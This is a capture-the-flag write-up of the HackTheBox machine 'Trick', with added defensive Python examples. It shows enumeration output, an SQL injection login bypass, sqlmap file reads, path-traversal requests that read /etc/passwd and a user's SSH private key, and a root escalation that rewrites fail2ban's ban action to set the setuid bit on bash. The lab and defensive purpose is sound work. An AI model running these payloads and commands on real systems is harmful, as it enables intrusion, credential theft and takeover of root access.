Writeup: HackTheBox machine "Trick"
Scans
MetaSploit
msf6 auxiliary(scanner/smtp/smtp_enum) > run
[*] 10.10.11.166:25 - 10.10.11.166:25 Banner: 220 debian.localdomain ESMTP Postfix (Debian/GNU)
[+] 10.10.11.166:25 - 10.10.11.166:25 Users found: , _apt, avahi, backup, bin, colord, daemon, dnsmasq, games, geoclue, gnats, hplip, irc, list, lp, mail, man, messagebus, mysql, news, nobody, postfix, postmaster, proxy, pulse, rtkit, saned, speech-dispatcher, sshd, sync, sys, systemd-coredump, systemd-network, systemd-resolve, systemd-timesync, tss, usbmux, uucp, www-data
[*] 10.10.11.166:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Nmap - SMTP Script
└─# nmap -script smtp-commands.nse 10.10.11.166
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-18 13:42 CEST
Nmap scan report for 10.10.11.166
Host is up (0.042s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open domain
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds
zsh: segmentation fault nmap -script smtp-commands.nse 10.10.11.166
Nmap
└─# nmap 10.10.11.166
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-18 13:33 CEST
Nmap scan report for 10.10.11.166
Host is up (0.091s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 6.01 seconds
WFUZZ
└─# wfuzz -w /usr/share/wordlists/wfuzz/general/common.txt --hc 404 http://10.10.11.166/FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.11.166/FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000076: 301 7 L 12 W 185 Ch "assets"
000000224: 301 7 L 12 W 185 Ch "css"
000000456: 301 7 L 12 W 185 Ch "js"
Total time: 0
Processed Requests: 951
Filtered Requests: 948
Requests/sec.: 0
SMTP
Telnet
EHLO all
250-debian.localdomain
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING
DNS
AXFR zone-transfer request
└─# dig axfr trick.htb @10.10.11.166
; <<>> DiG 9.18.6-2-Debian <<>> axfr trick.htb @10.10.11.166
;; global options: +cmd
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb. 604800 IN NS trick.htb.
trick.htb. 604800 IN A 127.0.0.1
trick.htb. 604800 IN AAAA ::1
preprod-payroll.trick.htb. 604800 IN CNAME trick.htb.
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 236 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Sun Sep 18 14:23:54 CEST 2022
;; XFR size: 6 records (messages 1, bytes 231)
Web
SQL Injection - Manual
Username: Test
Password: '
Notice: Trying to get property 'num_rows' of non-object in /var/www/payroll/admin_class.php on line 21
3
This one works for the admin GUI:
Username: Test
Password: 'OR 1=1 OR 1='test
Real User:
Enemigosss
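As an added illustration (not code from the writeup; the table and the user's password are constructed), the following Python/sqlite3 snippet shows why the lone `'` produces the num_rows error above while `'OR 1=1 OR 1='test` logs in, and how a parameterised query treats the same input as plain data:

```python
import sqlite3

# Constructed stand-in for the payroll login table (not the real schema).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('Enemigosss', 'secret')")
    return db

def login_vulnerable(db, username, password):
    """String-built query, the pattern the PHP notice above points to."""
    sql = ("SELECT id FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    try:
        return len(db.execute(sql).fetchall())  # counterpart of mysqli's num_rows
    except sqlite3.OperationalError:
        # A single quote leaves the SQL unterminated and the query fails; in the
        # PHP original this is where "num_rows of non-object" gets printed.
        return None

def login_safe(db, username, password):
    """Parameterised query: the payload is compared as data, never parsed as SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return len(db.execute(sql, (username, password)).fetchall())

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "Test", "'"))                   # None -> the error page
    print(login_vulnerable(db, "Test", "'OR 1=1 OR 1='test"))  # 1 -> WHERE is true for every row
    print(login_safe(db, "Test", "'OR 1=1 OR 1='test"))        # 0 -> no such password
```

The injected string turns the filter into `(username='Test' AND password='') OR 1=1 OR 1='test'`, which is true for every row, so the login sees "a match" regardless of the credentials.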
SQLMAP
Doesn't work:
sqlmap -u "http://preprod-payroll.trick.htb/ajax.php?action=login" --method POST --data "username=test&password=hi" -p "password"
OS-Shell:
sqlmap -u "http://preprod-payroll.trick.htb/ajax.php?action=login" --method POST --data "username=test&password=hi" -p "password"
Find other domains
Preprod- domains
sed 's/^/preprod-/' /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt > ./preprod-domains.txt
ffuf -w ./preprod-domains.txt -u http://trick.htb -H "Host: FUZZ.trick.htb"
Every domain returns a 200 response 👎:
preprod-redmine [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 99ms]
preprod-game [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 100ms]
preprod-citrix [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 99ms]
preprod-es [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 99ms]
preprod-stream [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 100ms]
preprod-dl [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 99ms]
preprod-qa [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 99ms]
preprod-irc [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 100ms]
preprod-billing [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 99ms]
preprod-webdisk.m [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 100ms]
So use -fs 5480 to filter out the requests whose response is exactly 5480 bytes:
└─# ffuf -w ./preprod-domains.txt -u http://trick.htb -H "Host: FUZZ.trick.htb" -fs 5480
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://trick.htb
:: Wordlist : FUZZ: ./preprod-domains.txt
:: Header : Host: FUZZ.trick.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 5480
________________________________________________
preprod-marketing [Status: 200, Size: 9660, Words: 3007, Lines: 179, Duration: 121ms]
:: Progress: [4989/4989] :: Job [1/1] :: 343 req/sec :: Duration: [0:00:13] :: Errors: 0 ::
Found! preprod-marketing.trick.htb
Read Files
sqlmap --url "preprod-payroll.trick.htb/ajax.php?action=login" --data "username=test&password=test" --file-read "/var/www/market/index.php" --batch
Via an insecure GET parameter → page is simply a path on the system
curl "preprod-marketing.trick.htb/index.php?page=..././..././..././etc/passwd"
Find the flag → the username michael is found in /etc/passwd
curl "preprod-marketing.trick.htb/index.php?page=..././..././..././home/michael/user.txt"
User Flag: b9ee***************
Find the private key (for the SSH connection):
curl "preprod-marketing.trick.htb/index.php?page=..././..././..././home/michael/.ssh/id_rsa"
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
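Added example (not from the writeup): why `..././` gets through a filter that strips `../` once, and how a resolver that normalises the path and then checks it is still under the web root behaves on the same input. The include root `/var/www/market` is an assumption taken from the sqlmap --file-read path above.

```python
import posixpath

# Assumed include root (the directory the sqlmap --file-read above pointed at).
WEB_ROOT = "/var/www/market"

def naive_sanitise(page):
    """Single-pass removal of '../' - the filter pattern that '..././' defeats."""
    return page.replace("../", "")

def resolve_naive(page):
    """Filter once, then build the include path (the vulnerable pattern)."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, naive_sanitise(page)))

def resolve_safe(page):
    """Normalise first, then refuse anything that escaped WEB_ROOT.

    Returns the absolute path to include, or None if the request must be rejected.
    """
    # posixpath.join discards WEB_ROOT when 'page' is absolute, so the prefix
    # check below also rejects '/etc/passwd' passed directly.
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, page))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate

if __name__ == "__main__":
    payload = "..././..././..././etc/passwd"
    print(naive_sanitise(payload))  # ../../../etc/passwd : each '..././' collapses to '../'
    print(resolve_naive(payload))   # /etc/passwd
    # Without the broken filter '...' is just an ordinary directory name, so the
    # normalised path stays inside WEB_ROOT and is harmless (it simply won't exist).
    print(resolve_safe(payload))    # /var/www/market/.../.../.../etc/passwd
    print(resolve_safe("../../../etc/passwd"))  # None: plain traversal is rejected
```

normpath works on the string only; on a real server resolve with os.path.realpath so a symlink inside WEB_ROOT cannot point outside it.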
Privilege Escalation
What can be run as root?
michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User michael may run the following commands on trick:
(root) NOPASSWD: /etc/init.d/fail2ban restart
→ The fail2ban service can be restarted as root
Edit the action file → new action on ban → chmod u+s /bin/bash
→ once this is executed, any user can start bash as root.
Command for editing it automatically (the file keeps being reset by Hack The Box):
sed "s/<iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>/chmod u+s \/bin\/bash/g" /etc/fail2ban/action.d/iptables-multiport.conf > config.conf
rm -f /etc/fail2ban/action.d/iptables-multiport.conf
mv config.conf /etc/fail2ban/action.d/iptables-multiport.conf
sudo /etc/init.d/fail2ban restart
Now trigger actionban:
- Either connect via SSH and enter a wrong password 5 times
- Or simply
hydra 10.10.11.166 ssh -l root -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Then run bash as root: sudo /bin/bash
and read the root flag: cat /root/flag.txt
Root Flag: d875*********
iptables-multiport.conf looks like this at the end:
michael@trick:~$ cat /etc/fail2ban/action.d/iptables-multiport.conf
# Fail2Ban configuration file
#
# Author: Cyril Jaquier
# Modified by Yaroslav Halchenko for multiport banning
#
[INCLUDES]
before = iptables-common.conf
[Definition]
# Option: actionstart
# Notes.: command executed once at the start of Fail2Ban.
# Values: CMD
#
actionstart = <iptables> -N f2b-<name>
<iptables> -A f2b-<name> -j <returntype>
<iptables> -I <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>
# Option: actionstop
# Notes.: command executed once at the end of Fail2Ban
# Values: CMD
#
actionstop = <iptables> -D <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>
<actionflush>
<iptables> -X f2b-<name>
# Option: actioncheck
# Notes.: command executed once before each actionban command
# Values: CMD
#
actioncheck = <iptables> -n -L <chain> | grep -q 'f2b-<name>[ \t]'
# Option: actionban
# Notes.: command executed when banning an IP. Take care that the
# command is executed with Fail2Ban user rights.
# Tags: See jail.conf(5) man page
# Values: CMD
#
actionban = chmod u+s /bin/bash
# Option: actionunban
# Notes.: command executed when unbanning an IP. Take care that the
# command is executed with Fail2Ban user rights.
# Tags: See jail.conf(5) man page
# Values: CMD
#
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
[Init]
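Added example (my own code, not part of the writeup or of fail2ban): a small audit that parses an iptables-* action file and flags what happened above, a ban command that no longer starts with a fail2ban tag such as `<iptables>` and no longer references `<ip>`. The sample text is a constructed excerpt of the tampered file, with the continuation-line indentation restored; the "first token must be a tag" rule is my heuristic, not a fail2ban requirement.

```python
import configparser
import re

# Constructed excerpt modelled on the tampered file shown above (indentation restored).
TAMPERED = """\
[INCLUDES]
before = iptables-common.conf
[Definition]
actionstart = <iptables> -N f2b-<name>
              <iptables> -A f2b-<name> -j <returntype>
actionstop = <iptables> -D <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>
             <actionflush>
             <iptables> -X f2b-<name>
actionban = chmod u+s /bin/bash
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
[Init]
"""

# Same file with the stock actionban (the line the sed command above replaced).
CLEAN = TAMPERED.replace("actionban = chmod u+s /bin/bash",
                         "actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>")

ACTION_KEYS = ("actionstart", "actionstop", "actioncheck", "actionban", "actionunban")
TAG_FIRST = re.compile(r"^<[A-Za-z_][A-Za-z0-9_-]*>")  # '<iptables>', '<actionflush>', ...

def audit_action(text):
    """Heuristic check for an iptables-* action (my rule, not fail2ban's): each command
    line must begin with a fail2ban tag, and ban/unban must mention the offending <ip>.
    Returns a list of human-readable findings; an empty list means nothing suspicious."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    findings = []
    for key in ACTION_KEYS:
        if not cp.has_option("Definition", key):
            continue
        value = cp.get("Definition", key)
        for cmd in value.splitlines():
            cmd = cmd.strip()
            if cmd and not TAG_FIRST.match(cmd):
                findings.append(f"{key}: literal command instead of a tag: {cmd!r}")
        if key in ("actionban", "actionunban") and "<ip>" not in value:
            findings.append(f"{key}: does not reference <ip>, so it bans nothing")
    return findings

if __name__ == "__main__":
    for finding in audit_action(TAMPERED):
        print("FINDING", finding)                 # two findings, both on actionban
    print("clean file findings:", audit_action(CLEAN))  # []
```

Run against every file in /etc/fail2ban/action.d as part of configuration monitoring; the sudo rule above makes any writable action file plus the permitted restart equivalent to root, so the files' ownership and write permissions deserve the same attention as their contents.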